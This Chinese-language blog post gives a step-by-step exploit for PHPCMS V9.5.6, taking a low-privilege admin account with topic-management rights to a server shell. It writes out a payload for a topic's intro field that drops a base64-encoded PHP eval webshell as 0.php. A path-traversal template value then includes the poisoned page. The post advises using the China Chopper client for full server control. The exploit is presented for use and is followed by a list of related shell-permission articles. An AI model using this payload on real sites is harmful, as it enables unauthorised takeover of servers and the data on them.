PHPCMS后台低权限拿SHELL

简介: 前提是需要有管理专题的权限测试版本PHPCMS程序版本:Phpcms V9.5.6 Release

前提是需要有管理专题的权限

测试版本

PHPCMS程序版本:Phpcms V9.5.6 Release

过程

1. 添加专题

专题名称:test

专题横幅:/1.jpg

专题缩略图:/1.jpg

专题导读:<?php file_put_contents('0.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==')); ?>

生成静态:是

专题生成目录:test000

专题子分类:test test


其他默认 -> 提交

2. 再次添加专题

专题名称:test1

专题横幅:/1.jpg

专题缩略图:/1.jpg

专题导读:

生成静态:是

专题生成目录:test111

专题子分类:test test


扩展设置

专题模板:value设置为 ../../../../html/special/test000/index


其他默认 -> 提交

最后生成文件 0.php, 直接使用中国菜刀进行注入,即可获取服务器全部权限,不会使用中国菜刀的 ,自行咕狗,使用此类方法也可以进行PHP大马以及小马的注入,直接可以控制服务器后台。

相关文章
|
7月前
|
Linux Shell 开发工具
Shell的运行原理以及Linux当中的权限问题
Shell的运行原理以及Linux当中的权限问题
88 0
|
Linux Shell 程序员
【Linux】shell运行原理及权限
前几期文章重点讲解了Linux的一些基本指令,让大家能够快速的上手使用Linux,也不知道大家运用的熟练不,今天我们深入学习下Linux的shell命令以及运行原理和Linux下的权限方面的一些知识。
|
关系型数据库 Shell PHP
PHPCMS后台低权限拿SHELL
前提是需要有管理专题的权限 测试版本 PHPCMS程序版本:Phpcms V9.5.6 Release
|
Linux Shell 数据安全/隐私保护
Linux:shell命令运行原理和权限的概念
Linux:shell命令运行原理和权限的概念
|
4月前
|
Shell Linux 程序员
详解shell 运行原理及Linux权限
详解shell 运行原理及Linux权限
|
7月前
|
Linux Shell 程序员
【Linux】权限(shell运行原理、概念,Linux权限)
【Linux】权限(shell运行原理、概念,Linux权限)
62 2
|
7月前
|
存储 Shell 数据安全/隐私保护
ZooKeeper【基础知识 04】控制权限ACL(原生的 Shell 命令)
【4月更文挑战第11天】ZooKeeper【基础知识 04】控制权限ACL(原生的 Shell 命令)
122 7
|
7月前
|
Shell Linux 开发工具
shell的介绍以及Linux权限的讲解
shell的介绍以及Linux权限的讲解
90 2
|
7月前
|
Shell Linux C语言
【Shell 命令集合 网络通讯 】Linux 设置终端机的写入权限 mesg 命令 使用指南
【Shell 命令集合 网络通讯 】Linux 设置终端机的写入权限 mesg 命令 使用指南
55 0
|
7月前
|
安全 Shell Linux
【Shell 命令集合 文件管理】Linux 设置文件创建时的默认权限掩码 umask命令使用教程
【Shell 命令集合 文件管理】Linux 设置文件创建时的默认权限掩码 umask命令使用教程
172 0